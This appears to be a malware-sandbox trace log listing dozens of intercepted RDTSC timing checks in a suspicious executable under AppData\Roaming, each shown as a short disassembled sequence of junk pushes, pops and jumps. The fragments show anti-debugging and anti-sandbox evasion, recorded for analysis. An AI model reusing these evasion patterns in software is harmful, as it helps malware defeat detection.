Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8C0 second address: CBA8F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0E94F51A58h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007F0E94F51A4Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F0E94F51A46h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC10DD second address: CC10EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC10EE second address: CC10FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAB3 second address: CBFAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0E948C9FB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAC5 second address: CBFAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAD0 second address: CBFAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0E948C9FB6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAEB second address: CBFB03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E94F51A4Eh 0x00000008 jp 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFF5C second address: CBFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFF62 second address: CBFF8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E94F51A52h 0x0000000f jnc 00007F0E94F51A46h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0235 second address: CC023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC04E1 second address: CC0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jng 00007F0E94F51A46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0503 second address: CC0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0AA0 second address: CC0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6BFA second address: CC6C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6C04 second address: CC6C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 jns 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 push ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F0E94F51A4Dh 0x00000022 jng 00007F0E94F51A46h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59F2 second address: CC59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59F6 second address: CC59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59FF second address: CC5A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B52 second address: CC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F0E94F51A46h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B60 second address: CC5B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B64 second address: CC5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B6E second address: CC5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B74 second address: CC5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B78 second address: CC5B86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B86 second address: CC5B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5E4A second address: CC5E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5FAB second address: CC5FB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0E94F51A48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6412 second address: CC6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F0E948C9FB6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6422 second address: CC6427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6427 second address: CC6431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E948C9FC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6431 second address: CC6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6446 second address: CC644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC68F7 second address: CC68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9443 second address: CC9453 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC95C5 second address: CC95D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC95D7 second address: CC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0E948C9FC4h 0x00000018 pushad 0x00000019 jmp 00007F0E948C9FC8h 0x0000001e je 00007F0E948C9FB6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9633 second address: CC9638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9638 second address: CC9653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FC3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9653 second address: CC965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCC012 second address: CCC016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDF4 second address: CCFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDF8 second address: CCFDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDFC second address: CCFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE02 second address: CCFE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0E948C9FE4h 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 jmp 00007F0E948C9FC5h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE3C second address: CCFE41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE41 second address: CCFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE49 second address: CCFE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0E94F51A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE85 second address: CCFE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE8B second address: CCFE91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCF507 second address: CCF50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCF50B second address: CCF51B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4206 second address: CD420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4361 second address: CD4383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD44EE second address: CD44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD44F2 second address: CD4520 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F0E94F51A50h 0x00000010 jnp 00007F0E94F51A62h 0x00000016 ja 00007F0E94F51A52h 0x0000001c jne 00007F0E94F51A46h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4687 second address: CD468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD468D second address: CD46B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F0E94F51A59h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD47E4 second address: CD4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC6h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jng 00007F0E948C9FB8h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81E74 second address: C81E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81E79 second address: C81ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0E948C9FB6h 0x00000009 jg 00007F0E948C9FB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dx, 9ED0h 0x00000019 mov ebx, dword ptr [ebp+12496053h] 0x0000001f mov edx, 497EB8E2h 0x00000024 mov dword ptr [ebp+12470854h], ecx 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F0E948C9FB8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, 1A64E797h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD53D5 second address: CD53E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0E94F51A46h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD53E2 second address: CD5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD5402 second address: CD5406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD5406 second address: CD5430 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E948C9FB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0E948C9FC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9B17 second address: CD9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9B1C second address: CD9B27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F0E948C9FB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9C98 second address: CD9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E00 second address: CD9E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E04 second address: CD9E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E0A second address: CD9E52 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E948C9FCCh 0x00000008 pushad 0x00000009 jmp 00007F0E948C9FC5h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007F0E948C9FB6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a jbe 00007F0E948C9FBCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB3B second address: CDFB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB3F second address: CDFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0E948C9FBCh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB51 second address: CDFB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E94F51A46h 0x00000009 jmp 00007F0E94F51A53h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB6F second address: CDFB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007F0E948C9FBEh 0x0000000e jnc 00007F0E948C9FB8h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D51 second address: CE0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D55 second address: CE0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D5B second address: CE0D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B39 second address: CE6B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B3F second address: CE6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B45 second address: CE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B4C second address: CE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B5F second address: CE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B63 second address: CE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AAB second address: CE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AB3 second address: CE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E94F51A46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AC2 second address: CE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D63 second address: CE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0E94F51A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D6F second address: CE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
